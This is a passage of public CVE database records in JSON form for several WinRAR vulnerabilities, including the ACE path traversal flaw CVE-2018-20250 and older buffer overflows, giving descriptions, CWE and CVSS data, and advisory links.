"dateUpdated": "2024-08-07T21:13:54.041Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-20250
Vulnerability from cvelistv5
Published
2019-02-05 20:00
Modified
2024-09-17 00:11
Severity ?
EPSS score ?
Summary
In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path.
References
| ▼ | URL | Tags |
|---|---|---|
| https://github.com/blau72/CVE-2018-20250-WinRAR-ACE | x_refsource_MISC | |
| https://research.checkpoint.com/extracting-code-execution-from-winrar/ | x_refsource_MISC | |
| https://www.exploit-db.com/exploits/46552/ | exploit, x_refsource_EXPLOIT-DB | |
| http://www.securityfocus.com/bid/106948 | vdb-entry, x_refsource_BID | |
| https://www.win-rar.com/whatsnew.html | x_refsource_MISC | |
| http://packetstormsecurity.com/files/152618/RARLAB-WinRAR-ACE-Format-Input-Validation-Remote-Code-Execution.html | x_refsource_MISC | |
| http://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_ace | x_refsource_MISC | |
| https://www.exploit-db.com/exploits/46756/ | exploit, x_refsource_EXPLOIT-DB |
Impacted products
| ▼ | Vendor | Product |
|---|---|---|
| Check Point Software Technologies Ltd. | WinRAR |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T11:58:19.126Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/blau72/CVE-2018-20250-WinRAR-ACE"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"name": "46552",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/46552/"
},
{
"name": "106948",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/106948"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.win-rar.com/whatsnew.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/152618/RARLAB-WinRAR-ACE-Format-Input-Validation-Remote-Code-Execution.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_ace"
},
{
"name": "46756",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/46756/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "WinRAR",
"vendor": "Check Point Software Technologies Ltd.",
"versions": [
{
"status": "affected",
"version": "All versions prior and including 5.61"
}
]
}
],
"datePublic": "2019-02-05T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-36",
"description": "CWE-36: Absolute Path Traversal",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-04-25T18:06:08",
"orgId": "897c38be-0345-43cd-b6cf-fe179e0c4f45",
"shortName": "checkpoint"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/blau72/CVE-2018-20250-WinRAR-ACE"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"name": "46552",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/46552/"
},
{
"name": "106948",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/106948"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.win-rar.com/whatsnew.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/152618/RARLAB-WinRAR-ACE-Format-Input-Validation-Remote-Code-Execution.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_ace"
},
{
"name": "46756",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/46756/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@checkpoint.com",
"DATE_PUBLIC": "2019-02-05T00:00:00",
"ID": "CVE-2018-20250",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "WinRAR",
"version": {
"version_data": [
{
"version_value": "All versions prior and including 5.61"
}
]
}
}
]
},
"vendor_name": "Check Point Software Technologies Ltd."
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-36: Absolute Path Traversal"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/blau72/CVE-2018-20250-WinRAR-ACE",
"refsource": "MISC",
"url": "https://github.com/blau72/CVE-2018-20250-WinRAR-ACE"
},
{
"name": "https://research.checkpoint.com/extracting-code-execution-from-winrar/",
"refsource": "MISC",
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"name": "46552",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/46552/"
},
{
"name": "106948",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/106948"
},
{
"name": "https://www.win-rar.com/whatsnew.html",
"refsource": "MISC",
"url": "https://www.win-rar.com/whatsnew.html"
},
{
"name": "http://packetstormsecurity.com/files/152618/RARLAB-WinRAR-ACE-Format-Input-Validation-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/152618/RARLAB-WinRAR-ACE-Format-Input-Validation-Remote-Code-Execution.html"
},
{
"name": "http://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_ace",
"refsource": "MISC",
"url": "http://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_ace"
},
{
"name": "46756",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/46756/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "897c38be-0345-43cd-b6cf-fe179e0c4f45",
"assignerShortName": "checkpoint",
"cveId": "CVE-2018-20250",
"datePublished": "2019-02-05T20:00:00Z",
"dateReserved": "2018-12-19T00:00:00",
"dateUpdated": "2024-09-17T00:11:50.340Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2004-1495
Vulnerability from cvelistv5
Published
2005-02-19 05:00
Modified
2024-08-08 00:53
Severity ?
EPSS score ?
Summary
The Repair Archive command in WinRAR 3.40 allows remote attackers to cause a denial of service (application crash) via a corrupt ZIP archive.
References
| ▼ | URL | Tags |
|---|---|---|
| http://marc.info/?l=bugtraq&m=109941351432699&w=2 | mailing-list, x_refsource_BUGTRAQ | |
| http://secunia.com/advisories/13070 | third-party-advisory, x_refsource_SECUNIA | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/17937 | vdb-entry, x_refsource_XF | |
| http://www.rarlabs.com/rarnew.htm | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/11581 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T00:53:24.177Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20041102 Medium Risk Vulnerability in WinRAR",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=109941351432699\u0026w=2"
},
{
"name": "13070",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/13070"
},
{
"name": "winrar-repair-archive(17937)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17937"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"name": "11581",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/11581"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2004-11-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The Repair Archive command in WinRAR 3.40 allows remote attackers to cause a denial of service (application crash) via a corrupt ZIP archive."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-10T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20041102 Medium Risk Vulnerability in WinRAR",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=109941351432699\u0026w=2"
},
{
"name": "13070",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/13070"
},
{
"name": "winrar-repair-archive(17937)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17937"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"name": "11581",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/11581"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2004-1495",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Repair Archive command in WinRAR 3.40 allows remote attackers to cause a denial of service (application crash) via a corrupt ZIP archive."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20041102 Medium Risk Vulnerability in WinRAR",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=109941351432699\u0026w=2"
},
{
"name": "13070",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/13070"
},
{
"name": "winrar-repair-archive(17937)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17937"
},
{
"name": "http://www.rarlabs.com/rarnew.htm",
"refsource": "CONFIRM",
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"name": "11581",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/11581"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2004-1495",
"datePublished": "2005-02-19T05:00:00",
"dateReserved": "2005-02-18T00:00:00",
"dateUpdated": "2024-08-08T00:53:24.177Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2024-30370
Vulnerability from cvelistv5
Published
2024-04-02 20:28
Modified
2024-08-02 01:32
Severity ?
EPSS score ?
Summary
RARLAB WinRAR Mark-Of-The-Web Bypass Vulnerability
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-24-357/ | x_research-advisory | |
| https://www.rarlab.com/rarnew.htm#27.%20Busgs%20fixed | vendor-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-30370",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-06T19:17:18.746474Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-06T19:17:39.956Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T01:32:07.042Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-24-357",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-357/"
},
{
"name": "vendor-provided URL",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.rarlab.com/rarnew.htm#27.%20Busgs%20fixed"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "WinRAR",
"vendor": "RARLAB",
"versions": [
{
"status": "affected",
"version": "7.00 beta 4 (64-bit)"
}
]
}
],
"dateAssigned": "2024-03-26T14:40:42.715-05:00",
"datePublic": "2024-04-01T13:31:49.166-05:00",
"descriptions": [
{
"lang": "en",
"value": "RARLAB WinRAR Mark-Of-The-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-Of-The-Web protection mechanism on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must perform a specific action on a malicious page.\n\nThe specific flaw exists within the archive extraction functionality. A crafted archive entry can cause the creation of an arbitrary file without the Mark-Of-The-Web. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current user. Was ZDI-CAN-23156."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-693",
"description": "CWE-693: Protection Mechanism Failure",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-04-02T20:28:47.578Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-24-357",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-357/"
},
{
"name": "vendor-provided URL",
"tags": [
"vendor-advisory"
],
"url": "https://www.rarlab.com/rarnew.htm#27.%20Busgs%20fixed"
}
],
"source": {
"lang": "en",
"value": "Orange Tsai(@orange.8361) and NiNi (@terrynini38514) from DEVCORE Research Team"
},
"title": "RARLAB WinRAR Mark-Of-The-Web Bypass Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2024-30370",
"datePublished": "2024-04-02T20:28:47.578Z",
"dateReserved": "2024-03-26T18:52:36.419Z",
"dateUpdated": "2024-08-02T01:32:07.042Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2006-3845
Vulnerability from cvelistv5
Published
2006-07-25 23:00
Modified
2024-08-07 18:48
Severity ?
EPSS score ?
Summary
Stack-based buffer overflow in lzh.fmt in WinRAR 3.00 through 3.60 beta 6 allows remote attackers to execute arbitrary code via a long filename in a LHA archive.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/21080 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.securityfocus.com/bid/19043 | vdb-entry, x_refsource_BID | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/27815 | vdb-entry, x_refsource_XF | |
| http://www.rarlabs.com/rarnew.htm | x_refsource_CONFIRM | |
| http://www.vupen.com/english/advisories/2006/2867 | vdb-entry, x_refsource_VUPEN | |
| http://hustlelabs.com/advisories/04072006_rarlabs.pdf | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T18:48:39.247Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "21080",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/21080"
},
{
"name": "19043",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/19043"
},
{
"name": "winrar-lha-bo(27815)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27815"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"name": "ADV-2006-2867",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2006/2867"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://hustlelabs.com/advisories/04072006_rarlabs.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-07-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in lzh.fmt in WinRAR 3.00 through 3.60 beta 6 allows remote attackers to execute arbitrary code via a long filename in a LHA archive."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-19T15:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "21080",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/21080"
},
{
"name": "19043",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/19043"
},
{
"name": "winrar-lha-bo(27815)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27815"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"name": "ADV-2006-2867",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2006/2867"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://hustlelabs.com/advisories/04072006_rarlabs.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2006-3845",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in lzh.fmt in WinRAR 3.00 through 3.60 beta 6 allows remote attackers to execute arbitrary code via a long filename in a LHA archive."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "21080",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/21080"
},
{
"name": "19043",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/19043"
},
{
"name": "winrar-lha-bo(27815)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27815"
},
{
"name": "http://www.rarlabs.com/rarnew.htm",
"refsource": "CONFIRM",
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"name": "ADV-2006-2867",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2006/2867"
},
{
"name": "http://hustlelabs.com/advisories/04072006_rarlabs.pdf",
"refsource": "MISC",
"url": "http://hustlelabs.com/advisories/04072006_rarlabs.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2006-3845",
"datePublished": "2006-07-25T23:00:00",
"dateReserved": "2006-07-25T00:00:00",
"dateUpdated": "2024-08-07T18:48:39.247Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2005-3263
Vulnerability from cvelistv5
Published
2005-10-20 04:00
Modified
2024-08-07 23:01
Severity ?
EPSS score ?
Summary
Stack-based buffer overflow in UNACEV2.DLL for RARLAB WinRAR 2.90 through 3.50 allows remote attackers to execute arbitrary code via an ACE archive containing a file with a long name.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/15062 | vdb-entry, x_refsource_BID | |
| http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0266.html | mailing-list, x_refsource_FULLDISC | |
| http://www.osvdb.org/19915 | vdb-entry, x_refsource_OSVDB | |
| http://secunia.com/advisories/16973/ | third-party-advisory, x_refsource_SECUNIA | |
| http://www.rarlabs.com/rarnew.htm | x_refsource_CONFIRM | |
| http://secunia.com/secunia_research/2005-53/advisory/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T23:01:59.191Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "15062",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/15062"
},
{
"name": "20051011 Secunia Research: WinRAR Format String and Buffer Overflow Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0266.html"
},
{
"name": "19915",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/19915"
},
{
"name": "16973",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/16973/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://secunia.com/secunia_research/2005-53/advisory/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2005-10-11T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in UNACEV2.DLL for RARLAB WinRAR 2.90 through 3.50 allows remote attackers to execute arbitrary code via an ACE archive containing a file with a long name."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2005-11-04T10:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "15062",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/15062"
},
{
"name": "20051011 Secunia Research: WinRAR Format String and Buffer Overflow Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0266.html"
},
{
"name": "19915",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/19915"
},
{
"name": "16973",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/16973/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://secunia.com/secunia_research/2005-53/advisory/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-3263",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in UNACEV2.DLL for RARLAB WinRAR 2.90 through 3.50 allows remote attackers to execute arbitrary code via an ACE archive containing a file with a long name."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "15062",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/15062"
},
{
"name": "20051011 Secunia Research: WinRAR Format String and Buffer Overflow Vulnerabilities",
"refsource": "FULLDISC",
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0266.html"
},
{
"name": "19915",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/19915"
},
{
"name": "16973",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/16973/"
},
{
"name": "http://www.rarlabs.com/rarnew.htm",
"refsource": "CONFIRM",
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"name": "http://secunia.com/secunia_research/2005-53/advisory/",
"refsource": "MISC",
"url": "http://secunia.com/secunia_research/2005-53/advisory/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-3263",
"datePublished": "2005-10-20T04:00:00",
"dateReserved": "2005-10-20T00:00:00",
"dateUpdated": "2024-08-07T23:01:59.191Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2005-4474
Vulnerability from cvelistv5
Published
2005-12-22 01:00
Modified
2024-08-07 23:46
Severity ?
EPSS score ?
Summary
Buffer overflow in the "Add to archive" command in WinRAR 3.51 allows user-assisted attackers to cause a denial of service (crash) and possibly execute arbitrary code by tricking the user into adding a file whose filename contains a non-default code page and non-ANSI characters, as demonstrated using a Chinese filename, possibly due to buffer expansion when using the WideCharToMultiByte API. NOTE: it is not clear whether this problem can be exploited for code execution. If not, then perhaps the user-assisted nature of the attack should exclude the issue from inclusion in CVE.
References
| ▼ | URL | Tags |
|---|---|---|
| http://securityreason.com/securityalert/290 | third-party-advisory, x_refsource_SREASON | |
| http://www.securityfocus.com/archive/1/420006/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://www.securityfocus.com/bid/15999 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T23:46:05.205Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "290",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/290"
},
{
"name": "20051221 WinRAR - Processing Filename Incorrectly Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/420006/100/0/threaded"
},
{
"name": "15999",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/15999"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2005-12-21T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the \"Add to archive\" command in WinRAR 3.51 allows user-assisted attackers to cause a denial of service (crash) and possibly execute arbitrary code by tricking the user into adding a file whose filename contains a non-default code page and non-ANSI characters, as demonstrated using a Chinese filename, possibly due to buffer expansion when using the WideCharToMultiByte API. NOTE: it is not clear whether this problem can be exploited for code execution. If not, then perhaps the user-assisted nature of the attack should exclude the issue from inclusion in CVE."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-19T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "290",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/290"
},
{
"name": "20051221 WinRAR - Processing Filename Incorrectly Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/420006/100/0/threaded"
},
{
"name": "15999",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/15999"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-4474",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
